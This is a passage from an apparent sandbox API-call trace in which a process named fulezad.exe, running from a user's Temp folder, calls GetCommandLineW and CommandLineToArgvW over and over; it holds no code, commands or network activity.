0x289ad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289b50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289bc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.827] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289c40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289cb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289d30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289da8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289e20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289e98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289f10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.828] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.828] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x289f88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a0f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a1e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a2d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a3c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.829] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.829] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a4b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a5a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.830] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.830] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a8f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28a9e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28aa60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28aad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ab50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28abc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ac40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28acb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.831] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ad30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.831] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ada8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ae20*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ae98*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28af10*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28af88*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b000*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b078*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b0f0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b168*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.832] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b1e0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.832] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b258*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b2d0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b348*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b3c0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b438*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b4b0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b528*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b5a0*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b618*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.833] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b690*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.833] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b790*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b808*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b880*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b8f8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b970*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28b9e8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28ba60*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bad8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.834] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.834] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bb50*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bbc8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bc40*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bcb8*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0103.835] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x28bd30*="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" [0103.835] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" 